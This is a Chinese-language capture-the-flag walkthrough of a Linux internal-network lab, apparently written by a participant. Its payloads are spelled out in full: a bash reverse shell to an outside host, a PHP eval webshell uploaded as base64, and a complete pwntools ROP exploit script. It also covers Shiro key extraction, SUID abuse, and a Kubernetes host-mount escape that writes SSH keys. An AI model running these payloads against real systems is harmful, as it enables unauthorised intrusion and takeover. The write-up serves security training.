入口- flag1#
信息搜集
❯ ./fscan -h 8.130.140.238
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-05-02 21:23:48] [INFO] 暴力破解线程数: 1
[2025-05-02 21:23:48] [INFO] 开始信息扫描
[2025-05-02 21:23:48] [INFO] 最终有效主机数量: 1
[2025-05-02 21:23:48] [INFO] 开始主机扫描
[2025-05-02 21:23:48] [INFO] 有效端口数量: 233
[2025-05-02 21:23:48] [SUCCESS] 端口开放 8.130.140.238:80
[2025-05-02 21:23:48] [SUCCESS] 端口开放 8.130.140.238:22
[2025-05-02 21:23:48] [SUCCESS] 端口开放 8.130.140.238:8080
[2025-05-02 21:23:48] [SUCCESS] 服务识别 8.130.140.238:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-05-02 21:23:53] [SUCCESS] 服务识别 8.130.140.238:80 => [http]
[2025-05-02 21:23:53] [SUCCESS] 服务识别 8.130.140.238:8080 => [http]
[2025-05-02 21:23:53] [INFO] 存活端口数量: 3
[2025-05-02 21:23:53] [INFO] 开始漏洞扫描
[2025-05-02 21:23:53] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-05-02 21:23:54] [SUCCESS] 网站标题 http://8.130.140.238 状态码:200 长度:10887 标题:""
[2025-05-02 21:23:54] [SUCCESS] 网站标题 http://8.130.140.238:8080 状态码:200 长度:1027 标题:Login Form
[2025-05-02 21:23:57] [SUCCESS] 目标: http://8.130.140.238:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-05-02 21:24:03] [SUCCESS] 扫描已完成: 5/58080端口存在ThinkPHP的nday,工具一把梭
检测到漏洞命令执行模块不回显可能开了disable function,直接传shell
蚁剑连接,根目录下拿到flag1
一级内网#
蚁剑写1.sh
#!/bin/bash
bash -i >& /dev/tcp/ip/9000 0>&1反弹shell
传fscan和venom,这里蚁剑传文件失败,用服务器开python Web后利用wget传文件
信息收集
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:0b:45:0a brd ff:ff:ff:ff:ff:ff
inet 172.28.23.17/16 brd 172.28.255.255 scope global dynamic eth0
valid_lft 1892158377sec preferred_lft 1892158377sec
inet6 fe80::216:3eff:fe0b:450a/64 scope link
valid_lft forever preferred_lft forever这里fscan 2.0扫不到任何东西,换到1.8后正常
./fscan -h 172.28.23.17/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.28.23.26 is alive
(icmp) Target 172.28.23.17 is alive
(icmp) Target 172.28.23.33 is alive
[*] Icmp alive hosts len is: 3
172.28.23.33:8080 open
172.28.23.17:8080 open
172.28.23.26:80 open
172.28.23.17:80 open
172.28.23.26:22 open
172.28.23.26:21 open
172.28.23.17:22 open
172.28.23.33:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.28.23.17 code:200 len:10887 title:""
[*] WebTitle http://172.28.23.17:8080 code:200 len:1027 title:Login Form
[*] WebTitle http://172.28.23.26 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[*] WebTitle http://172.28.23.33:8080 code:302 len:0 title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=70998A514AB7010967A5EE44F499EBEB
[*] WebTitle http://172.28.23.33:8080/login;jsessionid=70998A514AB7010967A5EE44F499EBEB code:200 len:3860 title:智联科技 ERP 后台登陆
[+] PocScan http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2扫到172.28.23.26、172.28.23.33两台资产,.33存在heapdump泄漏
搭建代理
本地./admin_macos_x64 -rhost 8.130.113.217 -rport 9999
靶机./agent_linux_x64 -lport 9999
172.28.23.33-flag3#
访问http://172.28.23.33:8080/actuator/heapdump拿到heapdump
利用工具分析
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================拿到shiro KEY,利用反序列化工具写马
没找到flag看网上WP说是个PWN题离谱
看下开放的端口
(ops01:/) $ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 661/java
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 172.28.23.33:68 0.0.0.0:* -
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp6 0 0 ::1:323 :::* - 用https://www.dr0n.top/posts/f249db01/上的EXP ↗
from pwn import *
context.arch='amd64'
def add(key,data='b'):
p.sendlineafter(b'Option:',b'1')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def show(key):
p.sendlineafter(b'Option:',b'2')
p.sendlineafter(b"Key: ",key);
def edit(key,data):
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def name(username):
p.sendlineafter(b'Option:',b'4')
p.sendlineafter(b'name:',username)
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
0:username+0x10,
0x10:[username+0x20,len(ukey),\
ukey,0],
0x30:[stack,0x10]
},filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0
rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall
fake_chunk=flat({
0:username+0x20,
0x20:[username+0x30,len(ukey),\
ukey,0],
0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
rdi,username+0x50,
rsi,0,
rdx,0,0,
rax,0x3b,
syscall
])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()
172.28.23.26-flag2#
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip扫到.26主机的ftp匿名登陆
ftp连接拿到OA管理系统的源码做审计
从main.php看起发现include了一个checklogin.php
<?php
function islogin(){
if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){
if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){
return true;
}
else {
return false;
}
}
else {
return false;
}
}
?>Cookie的各参数值不为空即判断为登录
登录成功后看下其他功能点,关键在文件上传即uploadbase64.php
<?php
/**
* Description: PhpStorm.
* Author: yoby
* DateTime: 2018/12/4 18:01
* Email:[email protected]
* Copyright Yoby版权所有
*/
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
用AI分析一波,文件内容及后缀可控,且会将路径返回😂
那么按他说的格式传马即可<?php @eval($_GET[1]); ?>
data:image/php;base64, PD9waHAgQGV2YWwoJF9HRVRbMV0pOyA/Pg==
ban了一堆的函数,用蚁剑插件绕过
这里POST的马很玄学的执行不了,按其他佬的方法改.antproxy.php,再写一个1.php的GET马
这样就执行成功了
在根目录找到flag
SUID提权
find / -type f -perm -04000 -ls 2>/dev/null
# /usr/bin/base32发现base32读取flag
二级内网#
.26机器为双网卡
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:16:3e:0b:9b:70 brd ff:ff:ff:ff:ff:ff inet 172.28.23.26/16 brd 172.28.255.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::216:3eff:fe0b:9b70/64 scope link valid_lft forever preferred_lft forever
3: eth1: mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:16:3e:0b:9b:45 brd ff:ff:ff:ff:ff:ff inet 172.22.14.6/16 brd 172.22.255.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80::216:3eff:fe0b:9b45/64 scope link valid_lft forever preferred_lft forever在入口机开启python web服务,将fscan和venom传到.26主机
python3 -m http.server 9000
wget http://172.28.23.17:9000/agent_linux_x64
搭建代理利用venom自带的SHELL进行下一步渗透
chmod +777 agent*
./agent_linux_x64 -rhost 172.28.23.17 -rport 9998
./fscan -h 172.22.14.6/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.14.37 is alive
(icmp) Target 172.22.14.6 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 3
172.22.14.46:80 open
172.22.14.6:80 open
172.22.14.6:22 open
172.22.14.37:22 open
172.22.14.6:21 open
172.22.14.37:10250 open
172.22.14.37:2379 open
172.22.14.46:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.22.14.46 code:200 len:785 title:Harbor
[*] WebTitle http://172.22.14.6 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[+] InfoScan http://172.22.14.46 [Harbor]
[*] WebTitle https://172.22.14.37:10250 code:404 len:19 title:None
[+] ftp 172.22.14.6:21:anonymous
[->]OASystem.zip
[+] PocScan http://172.22.14.46/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]又发现两台资产
172.22.14.46、172.22.14.37
其实/16网段还有MySQL数据库,后面会发现
172.22.14.46-flag5#
存在harbor服务,未授权漏洞,利用EXP[https://github.com/404tk/CVE-2022-46463 ↗]
拿到flag05
172.22.10.28-flag6#
转存project/projectadmin
python3 harbor.py http://172.22.14.46/ --dump project/projectadmin --v2
在以上路径找到项目jar包,利用任意反编译工具进行审计
在泄漏的配置里找到数据库密码
利用MDUT进行UDF提权,flag在根目录下
172.22.14.37-flag4#
主机 10250 端口开放,该端口为 k8s 的服务端口,扫描目标 k8s 是否存在漏洞。
❯ kube-hunter --remote 172.22.14.37
2025-05-03 01:56:11,112 INFO kube_hunter.modules.report.collector Started hunting
2025-05-03 01:56:11,112 INFO kube_hunter.modules.report.collector Discovering Open Kubernetes Services
2025-05-03 01:56:12,902 INFO kube_hunter.modules.report.collector Found open service "Kubelet API" at 172.22.14.37:10250
2025-05-03 01:56:15,266 INFO kube_hunter.modules.report.collector Found open service "Etcd" at 172.22.14.37:2379
2025-05-03 01:56:15,819 INFO kube_hunter.modules.report.collector Found open service "API Server" at 172.22.14.37:6443
2025-05-03 01:56:16,050 INFO kube_hunter.modules.report.collector Found vulnerability "K8s Version Disclosure" in 172.22.14.37:6443
2025-05-03 01:56:16,056 INFO kube_hunter.modules.report.collector Found vulnerability "Unauthenticated access to API" in 172.22.14.37:6443
2025-05-03 01:56:16,317 INFO kube_hunter.modules.report.collector Found vulnerability "Listing namespaces as anonymous user" in 172.22.14.37:6443
2025-05-03 01:56:16,573 INFO kube_hunter.modules.report.collector Found vulnerability "Listing roles as anonymous user" in 172.22.14.37:6443
2025-05-03 01:56:16,881 INFO kube_hunter.modules.report.collector Found vulnerability "Listing cluster roles as anonymous user" in 172.22.14.37:6443
2025-05-03 01:56:17,147 INFO kube_hunter.modules.report.collector Found vulnerability "Listing pods as anonymous user" in 172.22.14.37:6443
Nodes
+-------------+--------------+
| TYPE | LOCATION |
+-------------+--------------+
| Node/Master | 172.22.14.37 |
+-------------+--------------+
Detected Services
+-------------+--------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+-------------+--------------------+----------------------+
| Kubelet API | 172.22.14.37:10250 | The Kubelet is the |
| | | main component in |
| | | every Node, all pod |
| | | operations goes |
| | | through the kubelet |
+-------------+--------------------+----------------------+
| Etcd | 172.22.14.37:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current |
| | | state information, |
| | | and might contain |
| | | secrets |
+-------------+--------------------+----------------------+
| API Server | 172.22.14.37:6443 | The API server is in |
| | | charge of all |
| | | operations on the |
| | | cluster. |
+-------------+--------------------+----------------------+
Vulnerabilities
For further information about a vulnerability, search its ID in:
https://avd.aquasec.com/
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| ID | LOCATION | MITRE CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV005 | 172.22.14.37:6443 | Initial Access // | Unauthenticated | The API Server port | b'{"kind":"APIVersio |
| | | Exposed sensitive | access to API | is accessible. | ns","versions":["v1" |
| | | interfaces | | Depending on your | ],"serverAddressByCl |
| | | | | RBAC settings this | ientCIDRs":[{"client |
| | | | | could expose access | CIDR":"0.0.0.0/0","s |
| | | | | to or control of | ... |
| | | | | your cluster. | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV002 | 172.22.14.37:6443 | Initial Access // | K8s Version | The kubernetes | v1.16.6-beta.0 |
| | | Exposed sensitive | Disclosure | version could be | |
| | | interfaces | | obtained from the | |
| | | | | /version endpoint | |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing roles as | Accessing roles | ['kubeadm:bootstrap- |
| | | the K8S API Server | anonymous user | might give an | signer-clusterinfo', |
| | | | | attacker valuable | 'system:controller:b |
| | | | | information | ootstrap-signer', |
| | | | | | 'extension- |
| | | | | | apiserver-... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing pods as | Accessing pods might | [{'name': b'nginx-de |
| | | the K8S API Server | anonymous user | give an attacker | ployment-58d48b746d- |
| | | | | valuable information | q4zh7', 'namespace': |
| | | | | | b'default'}, |
| | | | | | {'name': |
| | | | | | b'coredns-5644d7b... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing namespaces | Accessing namespaces | ['default', 'kube- |
| | | the K8S API Server | as anonymous user | might give an | node-lease', 'kube- |
| | | | | attacker valuable | public', 'kube- |
| | | | | information | system'] |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+
| KHV007 | 172.22.14.37:6443 | Discovery // Access | Listing cluster | Accessing cluster | ['admin', 'cluster- |
| | | the K8S API Server | roles as anonymous | roles might give an | admin', 'edit', |
| | | | user | attacker valuable | 'flannel', |
| | | | | information | 'system:aggregate- |
| | | | | | to-admin', |
| | | | | | 'system:aggregate- |
| | | | | | to-edit... |
+--------+-------------------+----------------------+----------------------+----------------------+----------------------+参考浅析K8S各种未授权攻击方法 ↗,K8s 集群由于鉴权配置不当,将「system:anonymous」用户绑定到「cluster-admin」用户组,使 6443 端口允许匿名用户以管理员权限向集群内部下发指令。
写一个evil-deployment.yaml配置文件创建恶意pod,把宿主机/目录挂载到容器内部/mnt目录,写公钥即可成功逃逸
evil-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.8
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /部署pod
❯ kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
Please enter Username: 1
Please enter Password: deployment.apps/nginx-deployment configured列出当前所有pod
❯ kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: 1
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-bgdhg 1/1 Running 0 34s执行命令进入bash
❯ kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-bgdhg -- /bin/bash
Please enter Username: 1
Please enter Password: root@nginx-deployment-864f8bfd6f-bgdhg:/# ls接下来写公钥
echo "你的公钥" > /mnt/root/.ssh/authorized_keysssh连接靶机,查看开放3306端口,flag在数据库里
ssh -i id_ed25519 [email protected]
总结#
很少有全是Linux机器的靶场,复现起来还算顺手。
但是代理几十分钟断一次很难绷,不少时间都在重新配代理,其他环境都没有这种情况